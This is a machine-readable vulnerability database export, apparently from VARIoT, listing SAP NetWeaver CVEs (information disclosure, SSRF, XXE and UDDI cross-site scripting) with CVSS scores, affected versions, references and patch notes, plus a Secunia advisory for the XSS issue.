"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.03:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-3787"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Gutsko of Positive Research Center",
"sources": [
{
"db": "BID",
"id": "67448"
}
],
"trust": 0.3
},
"cve": "CVE-2014-3787",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2014-3787",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-3787",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201405-322",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002561"
},
{
"db": "NVD",
"id": "CVE-2014-3787"
},
{
"db": "CNNVD",
"id": "CNNVD-201405-322"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver 7.20 and earlier allows remote attackers to read arbitrary SAP Central User Administration (SAP CUA) tables via unspecified vectors. SAP NetWeaver is prone to an information-disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. \nSAP NetWeaver 7.20 and prior are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-3787"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002561"
},
{
"db": "BID",
"id": "67448"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-3787",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "58671",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002561",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201405-322",
"trust": 0.6
},
{
"db": "BID",
"id": "67448",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "67448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002561"
},
{
"db": "NVD",
"id": "CVE-2014-3787"
},
{
"db": "CNNVD",
"id": "CNNVD-201405-322"
}
]
},
"id": "VAR-201405-0533",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.418644048
},
"last_update_date": "2023-12-18T13:53:22.604000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 1997455",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002561"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002561"
},
{
"db": "NVD",
"id": "CVE-2014-3787"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://en.securitylab.ru/lab/pt-2014-09"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/58671"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1997455"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3787"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3787"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "67448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002561"
},
{
"db": "NVD",
"id": "CVE-2014-3787"
},
{
"db": "CNNVD",
"id": "CNNVD-201405-322"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "67448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002561"
},
{
"db": "NVD",
"id": "CVE-2014-3787"
},
{
"db": "CNNVD",
"id": "CNNVD-201405-322"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-05-15T00:00:00",
"db": "BID",
"id": "67448"
},
{
"date": "2014-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002561"
},
{
"date": "2014-05-19T14:55:13.487000",
"db": "NVD",
"id": "CVE-2014-3787"
},
{
"date": "2014-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201405-322"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-05-21T00:42:00",
"db": "BID",
"id": "67448"
},
{
"date": "2014-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-002561"
},
{
"date": "2014-05-20T12:43:10.690000",
"db": "NVD",
"id": "CVE-2014-3787"
},
{
"date": "2014-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201405-322"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201405-322"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver In any SAP Vulnerability to read central user management table",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002561"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201405-322"
}
],
"trust": 0.6
}
}
var-202204-0866
Vulnerability from variot
Some part of SAP NetWeaver (EP Web Page Composer) does not sufficiently validate an XML document accepted from an untrusted source, which allows an adversary to exploit unprotected XML parking at endpoints, and a possibility to conduct SSRF attacks that could compromise system�s Availability by causing system to crash. SAP of SAP NetWeaver Contains a server-side request forgery vulnerability.Service operation interruption (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202204-0866",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-012079"
},
{
"db": "NVD",
"id": "CVE-2022-28217"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-28217"
}
]
},
"cve": "CVE-2022-28217",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 4.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 4.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2022-28217",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2022-28217",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2022-28217",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202204-3297",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-012079"
},
{
"db": "NVD",
"id": "CVE-2022-28217"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3297"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Some part of SAP NetWeaver (EP Web Page Composer) does not sufficiently validate an XML document accepted from an untrusted source, which allows an adversary to exploit unprotected XML parking at endpoints, and a possibility to conduct SSRF attacks that could compromise system\ufffds Availability by causing system to crash. SAP of SAP NetWeaver Contains a server-side request forgery vulnerability.Service operation interruption (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-28217"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012079"
},
{
"db": "VULMON",
"id": "CVE-2022-28217"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-28217",
"trust": 3.3
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012079",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3297",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-28217",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-28217"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012079"
},
{
"db": "NVD",
"id": "CVE-2022-28217"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3297"
}
]
},
"id": "VAR-202204-0866",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:34:31.450000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-918",
"trust": 1.0
},
{
"problemtype": "Server-side request forgery (CWE-918) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-012079"
},
{
"db": "NVD",
"id": "CVE-2022-28217"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 2.5,
"url": "https://launchpad.support.sap.com/#/notes/3148377"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28217"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-28217/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/sap-multiple-vulnerabilities-de-decembre-2021-38045"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/112.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-28217"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012079"
},
{
"db": "NVD",
"id": "CVE-2022-28217"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3297"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2022-28217"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-012079"
},
{
"db": "NVD",
"id": "CVE-2022-28217"
},
{
"db": "CNNVD",
"id": "CNNVD-202204-3297"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-06-13T00:00:00",
"db": "VULMON",
"id": "CVE-2022-28217"
},
{
"date": "2023-08-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-012079"
},
{
"date": "2022-06-13T17:15:10.017000",
"db": "NVD",
"id": "CVE-2022-28217"
},
{
"date": "2022-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202204-3297"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-06-13T00:00:00",
"db": "VULMON",
"id": "CVE-2022-28217"
},
{
"date": "2023-08-25T08:14:00",
"db": "JVNDB",
"id": "JVNDB-2022-012079"
},
{
"date": "2023-11-07T03:45:34.970000",
"db": "NVD",
"id": "CVE-2022-28217"
},
{
"date": "2022-07-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202204-3297"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202204-3297"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP\u00a0 of \u00a0SAP\u00a0NetWeaver\u00a0 Server-side request forgery vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-012079"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202204-3297"
}
],
"trust": 0.6
}
}
var-201709-1265
Vulnerability from variot
SAP NetWeaver is prone to an XML External Entity injection vulnerability. Attackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-1265",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100800"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100800"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an XML External Entity injection vulnerability.\nAttackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions.",
"sources": [
{
"db": "BID",
"id": "100800"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100800",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100800"
}
]
},
"id": "VAR-201709-1265",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:57:41.015000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2492658"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/11/14/sap-security-patch-day-november-2017/"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/09/12/sap-security-patch-day-september-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100800"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100800"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100800"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-19T22:36:00",
"db": "BID",
"id": "100800"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100800"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver XML External Entity Injection Vulnerability",
"sources": [
{
"db": "BID",
"id": "100800"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "100800"
}
],
"trust": 0.3
}
}
var-200908-0363
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in uddiclient/process in the UDDI client in SAP NetWeaver Application Server (Java) 7.0 allows remote attackers to inject arbitrary web script or HTML via the TModel Key field. SAP NetWeaver Application Server is prone to an HTML-injection vulnerability because the application's UDDI client fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. This issue is documented by SAP Note 1322098. ----------------------------------------------------------------------
Do you have VARM strategy implemented?
(Vulnerability Assessment Remediation Management)
If not, then implement it through the most reliable vulnerability intelligence source on the market.
Implement it through Secunia.
For more information visit: http://secunia.com/advisories/business_solutions/
Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com
TITLE: SAP NetWeaver Application Server UDDI Client Cross-Site Scripting
SECUNIA ADVISORY ID: SA36228
VERIFY ADVISORY: http://secunia.com/advisories/36228/
DESCRIPTION: A vulnerability has been reported in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting attacks.
The vulnerability is reported in SAP NetWeaver Application Server Java version 7.0. Other versions may also be affected.
SOLUTION: Apply vendor patch (please see SAP note 1322098). https://service.sap.com/sap/support/notes/1322098
PROVIDED AND/OR DISCOVERED BY: Alexander Polyakov, Digital Security Research Group [DSecRG]
ORIGINAL ADVISORY: http://www.dsecrg.com/pages/vul/show.php?id=133
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
